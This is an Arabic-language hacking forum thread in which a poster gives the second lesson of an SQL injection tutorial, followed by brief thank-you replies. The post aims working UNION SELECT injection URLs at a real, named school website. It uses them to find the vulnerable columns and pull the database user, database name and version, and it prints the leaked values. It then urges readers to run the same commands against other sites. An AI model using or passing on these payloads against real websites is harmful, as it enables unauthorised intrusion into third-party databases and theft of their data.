![]() |
تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه [ السلام عليكم ورحمة الله وبركاته الشرح مقدم للأخ هيثم وباقي اعضاء المنتدى الكريم كنت قد شرحت في درس الامس طريقة اكتشاف ثغرة سيكول (sql injection) ==================== ووعدتكم بالانتقال الى مرحلة اخرى وهي اكتشاف العمود المصاب وتطبيق بعض الاوامر عليه ... ==================== أما الدرس القادم والاخير غدا ان شاء الله اعرف ان هناك شروحات مميزة للاخوة المحترفين وتفوق شرحي بكثير لكن انا اردت كسر الهوه بين المحترف والمبتدء نبدأ على بركة الله.... لنأخذ الموقع التالي [html]http://www.dsasummercamp.edu.gr/news.php?id=123[/html]نريد ان نعرف ماهو الجدول المصاب والذي سوف نسحب من المعلومات في الدرس السابق عرفنا ان عدد الجداول 5 وعندها سنستخدم الامر التالي : كود: union+select كود: union+select+1,2,3,4,5-- كود: http://www.dsasummercamp.edu.gr/news.php?id=123+union+select+1,2,3,4,5-- نضع هذا الرابط في المتصفح لنرى الجدول المصاب من بين هذه الجداول ال5 .... وضعته لكن لم يظهر اي شيء طيب ما الحل ؟!! الحل ان اضع اشارة - بعد ال= يعني يصبح الرابط : كود: http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,2,3,4,5-- انظر الصورة :http://rita.webuda.com/imags/3.png ظهر لي الاعمده 2 4 5 يعني ان الجدول 2 و4 و5 مصابات ونستطيع سحب المعلومات من اي جدول نريده من بين هذه الجداول والان دعونا نطبق بعض الاوامر لمعرفة اسم المستخدم لهذه القاعده نضع الامر التالي : كود: user() فيصبح الرابط على الشكل التالي كود: http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,user%28%29,3,4,5-- انظر الصورة : http://rita.webuda.com/imags/4.png طيب نريد اسم القاعده فنضع الامر التالي مكان العمود المصاب كود: database() كود: http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,database%28%29,3,4,5-- طيب نريد ان نرى اصدار القاعده نستخدم الامر التالي كود: version() كود: http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,version%28%29,3,4,5-- طيب اذا اردت الاستعلام عن الاصدار واسم المستخدم واسم القاعده استخدم هذا الامر كود: concat(user(),0x3a3a,database(),0x3a3a,version()) هذا الامر concat لجمع عدة اوامر مع بعضها 0x3a3a هذه العلامة سوف تفصل بين اسم القاعده واسم المستخدم والاصدار وهي مشفره بالهيكسس وتعني العلامة التاليه : كود: :: itis_dsa@localhost::itis_dsa::5.1.63 انظر الصورة : http://rita.webuda.com/imags/5.png اترك لكم الان التطبيق على عدد من المواقع وتطبيق هذه الاوامر للانتقال الى المرحله الاخيره انتهى الدرس الثاني استودعكم الله لكم تحيات اخوكم the punisher |
رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه merci khoya t le seul li kay3raf yfaham ta wa7ed mafhmt chkaydire hna mn ghirek merci |
رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه يعطيك العافية يابطل |
رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه merci Khoya bezzaf Lah Ir7am Lwalidin kamal |
الساعة الآن 09:35 PM |
[ vBspiders.Com Network ]